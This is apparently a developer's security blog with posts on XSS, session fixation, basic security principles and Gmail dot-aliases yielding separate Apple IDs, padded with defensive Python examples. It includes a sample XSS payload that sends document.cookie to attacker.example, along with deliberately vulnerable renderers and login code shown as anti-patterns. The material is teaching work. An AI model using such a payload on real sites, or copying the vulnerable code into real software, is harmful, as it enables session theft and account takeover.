Random things – session hijacking

Written on 18 March 2017, 11:53am


Two notes about session hijacking methods:

Difference between stored and reflected XSS attack

Stored or persistent XSS attack – relies on attacker input that the server stores and later serves to other users. Typical example – a comment on a news site.
Reflected or non-persistent XSS attack – relies on input carried in the request itself (query parameters, form fields) and echoed straight back in the response. Typical example – a site search page that shows the keyword above the results. Either way, once the script runs in the victim’s browser it can read document.cookie and send the session ID to the attacker, unless the cookie is HttpOnly.
Play the XSS game: xss-game.appspot.com
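Both variants side by side, as an added Python example (not code from the original post): a search page that reflects the query parameter and a comment page that replays stored comments, each in a vulnerable and an output-encoded form. The payload, the attacker host and all function names are constructed for the illustration.

```python
import html
from urllib.parse import parse_qs, quote

# Constructed sample input: a cookie-stealing probe, the kind of thing that
# turns an XSS bug into session hijacking. The target host is hypothetical.
PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'


def make_query(keyword: str) -> str:
    """Build the query string a browser would send when searching for `keyword`."""
    return "q=" + quote(keyword)


# --- Reflected XSS: the keyword travels in the request and is echoed back ---

def search_page_vulnerable(query_string: str) -> str:
    """Puts the 'q' parameter into the page exactly as received."""
    q = parse_qs(query_string).get("q", [""])[0]
    return f"<h1>Results for: {q}</h1>"


def search_page_safe(query_string: str) -> str:
    """Same page; the keyword is entity-encoded for an HTML text context."""
    q = parse_qs(query_string).get("q", [""])[0]
    return f"<h1>Results for: {html.escape(q, quote=True)}</h1>"


# --- Stored XSS: the comment is persisted once and served to every visitor ---

COMMENTS = []  # stands in for the comments table in the database


def post_comment(text: str) -> None:
    # Stored as typed. Encoding belongs at output time, because the same text
    # may later be rendered into HTML, JSON, a mail body or a log line.
    COMMENTS.append(text)


def comments_page_vulnerable() -> str:
    return "".join(f"<p>{c}</p>" for c in COMMENTS)


def comments_page_safe() -> str:
    return "".join(f"<p>{html.escape(c, quote=True)}</p>" for c in COMMENTS)


def contains_script_tag(page: str) -> bool:
    """Crude check, used only to show the difference between the two renderers."""
    return "<script" in page.lower()


if __name__ == "__main__":
    qs = make_query(PAYLOAD)
    print("reflected, vulnerable:", search_page_vulnerable(qs))
    print("reflected, safe:      ", search_page_safe(qs))
    post_comment(PAYLOAD)
    print("stored, vulnerable:   ", comments_page_vulnerable())
    print("stored, safe:         ", comments_page_safe())
```

html.escape is the right encoder for text between tags; a value placed inside an attribute, a script block or a URL needs the encoder for that context, and a template engine with auto-escaping on is the practical way to get this right everywhere.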

Session fixation

In a nutshell, session fixation means that the attacker obtains a legitimate session ID from the server and then makes the victim’s browser use it; once the victim logs in, the attacker holds an authenticated session without ever having to steal the ID. See example.
The counter-measures are quite simple:
– do not accept a session ID supplied via URL/POST parameters; only honour the cookie the server itself issued
– regenerate the session ID after login (and after any other privilege change), so an ID the attacker learned beforehand is worthless
– just use HTTPS and Secure (plus HttpOnly) cookies; it’s 2017 and HTTPS adoption has reached the tipping point
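The three counter-measures in working form, as an added Python example that is not code from the original post. The session store, the cookie handling and the scripted attack are a toy stand-in for what a web framework does; every name in it is made up for the illustration.

```python
import secrets
from typing import Dict, Optional

SESSION_COOKIE = "sid"


class Session:
    def __init__(self) -> None:
        self.user: Optional[str] = None  # None until a login succeeds


class SessionStore:
    """In-memory stand-in for the server-side session table."""

    def __init__(self) -> None:
        self._sessions: Dict[str, Session] = {}

    @staticmethod
    def _new_id() -> str:
        return secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG, unguessable

    def create(self) -> str:
        sid = self._new_id()
        self._sessions[sid] = Session()
        return sid

    def get(self, sid: str) -> Optional[Session]:
        return self._sessions.get(sid)

    def rotate(self, old_sid: str) -> str:
        """Move the state to a fresh ID and invalidate the old one in the same step."""
        session = self._sessions.pop(old_sid)
        new_sid = self._new_id()
        self._sessions[new_sid] = session
        return new_sid


def resolve_session(store: SessionStore, cookies: Dict[str, str], params: Dict[str, str]) -> str:
    """Counter-measure 1: the session ID is read from the cookie only.

    `params` (URL/POST parameters) is deliberately never consulted, so a link like
    /login?sid=... cannot plant an ID. A cookie value the server never issued is
    discarded and replaced, not adopted.
    """
    sid = cookies.get(SESSION_COOKIE)
    if sid is None or store.get(sid) is None:
        return store.create()
    return sid


def login(store: SessionStore, sid: str, username: str, password_ok: bool) -> str:
    """Counter-measure 2: on successful login the ID is regenerated, so an ID the
    attacker knew from before the login no longer refers to anything."""
    if not password_ok:
        return sid
    new_sid = store.rotate(sid)
    store.get(new_sid).user = username
    return new_sid


def set_cookie_header(sid: str) -> str:
    """Counter-measure 3: Secure keeps the ID off plaintext HTTP, HttpOnly keeps it
    away from script (the XSS case above), SameSite=Lax limits cross-site sends."""
    return f"Set-Cookie: {SESSION_COOKIE}={sid}; Secure; HttpOnly; SameSite=Lax; Path=/"


def fixation_attempt() -> bool:
    """Replay the attack: the attacker gets a real ID, gets it into the victim's
    browser, the victim logs in. Returns True if the attacker's ID is now a
    logged-in session, i.e. if the attack worked."""
    store = SessionStore()
    attacker_sid = store.create()                    # step 1: legitimate ID from the server
    victim_cookies = {SESSION_COOKIE: attacker_sid}  # step 2: planted in the victim's browser
    sid = resolve_session(store, victim_cookies, {"sid": "ignored"})
    sid = login(store, sid, "alice", password_ok=True)  # step 3: victim logs in
    hijacked = store.get(attacker_sid)
    return hijacked is not None and hijacked.user is not None
```

Note that the first measure alone does not stop the attack: the planted ID is one the server really issued, so it passes the cookie check, and only the rotation at login makes it worthless. Frameworks expose this step directly (PHP session_regenerate_id(true), Django request.session.cycle_key(), express-session req.session.regenerate()); the mistake is forgetting to call it.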

Security concepts #2

Written on 29 January 2017, 09:40pm


Functional requirements – what a system must do.
Non-functional requirements – how the system must behave: on top of performance, usability and maintainability -> security.
CIA – Confidentiality (privacy), Integrity, Availability; often extended with non-repudiation.

Attacker levels

kid-level: unskilled, opportunistic, bragging rights
malware/ransomware: automated, opportunistic, financial gain
professional attacker: highly skilled, resources, persistent, adapt to their targets
nation state level: best skills available, big resources, goals – aligned with the country military/geo-strategic objectives

Vulnerability / exposure / security incident

Vulnerability types: bugs and flaws. Bugs – defects in the implementation (a missing bounds check, an unescaped output); they can often be detected by automated tools such as static analysers and fuzzers. Flaws – defects in the design (an authorization check missing from the architecture, a trust boundary drawn in the wrong place); they cannot be detected by automated tools and need threat modelling and design review.
A vulnerability does not necessarily cause an impact on its own. It needs 2 more steps:
Exposure: the vulnerability becomes known to an attacker
Security incident: the attacker takes advantage of the exposure to perform an attack

Vulnerability assessment: black box vs white box testing
Black box – no access to the source code, hosting environment, etc
White box – full access to the source code, hosting, etc

Some principles:

– minimize the attack surface
– secure defaults (coding and configuration)
– fail securely (defensive coding: an error path must not leave the system more open than the normal path)
– give least privilege (need to know)
– multiple layers, i.e. defence in depth (ex. an encrypted USB key, in a locked safe)
– no security by obscurity
– keep the design simple

Identification, Authentication, Authorization

Identification – who are you?
Authentication – how can you prove who you are?
Authorization – what can you do once authenticated?

Some specifics

– don’t say why the authentication failed (‘wrong username’ -> account enumeration, ‘wrong password’ -> confirms a valid account to brute force)
– do not change data on the server via an HTTP GET request (browsers, caches and prefetchers treat GET as safe, and a GET is trivial to trigger cross-site)
– allow pasting passwords (blocking paste only punishes people who use a password manager)
– do not make the “Log out” option difficult to find
– just use HTTPS
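The first point in code, as an added Python example (not from the original post): a login check that returns the same message whether the username or the password was wrong, and does the same amount of password hashing in both cases so the response time is not a tell either; the leaky version it is contrasted with is the anti-pattern the note warns about. The user table, the password and the iteration count are constructed for the illustration.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Tuple

# Cost parameter kept low so the example runs quickly; use far more in production.
ITERATIONS = 20_000
GENERIC_ERROR = "Invalid username or password."


def hash_password(password: str, salt: bytes = None) -> Tuple[bytes, bytes]:
    salt = salt if salt is not None else secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, digest


# Constructed user table: one account. In reality this is a database row.
USERS: Dict[str, Tuple[bytes, bytes]] = {"alice": hash_password("correct horse battery staple")}

# A throwaway record used when the username does not exist, so the server does
# the same hashing work either way and an unknown user is not answered faster.
_DUMMY = hash_password(secrets.token_hex(16))


def authenticate(username: str, password: str) -> Tuple[bool, str]:
    """Return (ok, message). The message never says which half was wrong."""
    salt, digest = USERS.get(username, _DUMMY)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    # compare_digest runs in constant time, so a near-miss digest is no faster to reject.
    if username in USERS and hmac.compare_digest(candidate, digest):
        return True, "OK"
    return False, GENERIC_ERROR


def leaky_authenticate(username: str, password: str) -> Tuple[bool, str]:
    """The anti-pattern: two different messages, and no hashing at all for an
    unknown user, which also makes that branch measurably quicker."""
    if username not in USERS:
        return False, "Unknown username."
    salt, digest = USERS[username]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    if hmac.compare_digest(candidate, digest):
        return True, "OK"
    return False, "Wrong password."
```

The same enumeration leak usually exists elsewhere, in the sign-up form (“email already registered”) and in password reset, so those responses need the same neutral wording; and a generic message is no substitute for rate limiting the login endpoint.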

Distinct Apple IDs for the same GMail account

Written on 28 January 2017, 02:45pm


It’s probably well known by now that when you create a GMail account, any periods (dot characters) in your username are ignored by GMail:

If you have a personal account (typically ending in gmail.com), it doesn’t matter if people type the period in your username or not.
For example, emails to all of these addresses will be delivered to the same Gmail account:
johnsmith@gmail.com
jo.hn.smith@gmail.com
john.smith@gmail.com
https://support.google.com/mail/answer/10313?hl=en

What is the impact of this feature on the creation of new Apple IDs?
Well, for Apple the 3 email addresses above are distinct, so it will allow 3 separate Apple IDs to be created with them. During the Apple ID registration process, an email with the subject Verify your Apple ID email address is sent to confirm ownership of the email address. Naturally, in all 3 cases above, the verification email lands in the same GMail account, so the check says nothing about whether the mailbox already has an account.
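What a registration system has to do if it wants one account per mailbox rather than one per spelling, as an added Python example (not Apple’s or Google’s code): canonicalise the address before the uniqueness check. Beyond the dots the post mentions, Gmail also ignores letter case and anything after a “+” in the local part, and the googlemail.com domain is Google’s alias for the same mailboxes; the function folds all of these, and the registry class and its names are made up for the illustration.

```python
from typing import Dict

# Domains that deliver to the same mailbox regardless of dots in the local part.
DOT_INSENSITIVE_DOMAINS = {"gmail.com", "googlemail.com"}


def canonical_email(address: str) -> str:
    """Key under which an address should be checked for uniqueness.

    For Gmail the local part is case-folded, cut at the first '+' and stripped of
    dots. For every other domain only the domain is case-folded, because RFC 5321
    leaves the meaning of the local part to the receiving server.
    """
    local, sep, domain = address.strip().rpartition("@")
    if not sep or not local or not domain:
        raise ValueError(f"not an email address: {address!r}")
    domain = domain.lower()
    if domain in DOT_INSENSITIVE_DOMAINS:
        local = local.lower().split("+", 1)[0].replace(".", "")
    return f"{local}@{domain}"


class AccountRegistry:
    """Toy registration: one account per canonical mailbox, not per spelling."""

    def __init__(self) -> None:
        self._by_mailbox: Dict[str, str] = {}  # canonical key -> address as entered

    def register(self, email: str) -> str:
        key = canonical_email(email)
        if key in self._by_mailbox:
            raise ValueError(f"{email} already belongs to an account ({self._by_mailbox[key]})")
        self._by_mailbox[key] = email
        return key

    def count(self) -> int:
        return len(self._by_mailbox)


if __name__ == "__main__":
    # The three spellings from the post, all one Gmail mailbox.
    reg = AccountRegistry()
    for addr in ("johnsmith@gmail.com", "jo.hn.smith@gmail.com", "john.smith@gmail.com"):
        try:
            print("registered", addr, "as", reg.register(addr))
        except ValueError as err:
            print("rejected:", err)
    print("accounts:", reg.count())
```

Whether to collapse the spellings is a product decision, but the verification mail is not a substitute for the check: it proves the registrant can read the mailbox, not that the mailbox is new. Store the address as the user typed it for sending mail and use the canonical form only as the uniqueness key.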

This is already a bit awkward, but I guess it’s something that does not create any problems, so Apple had no reason to work around it.
The real problem is described below.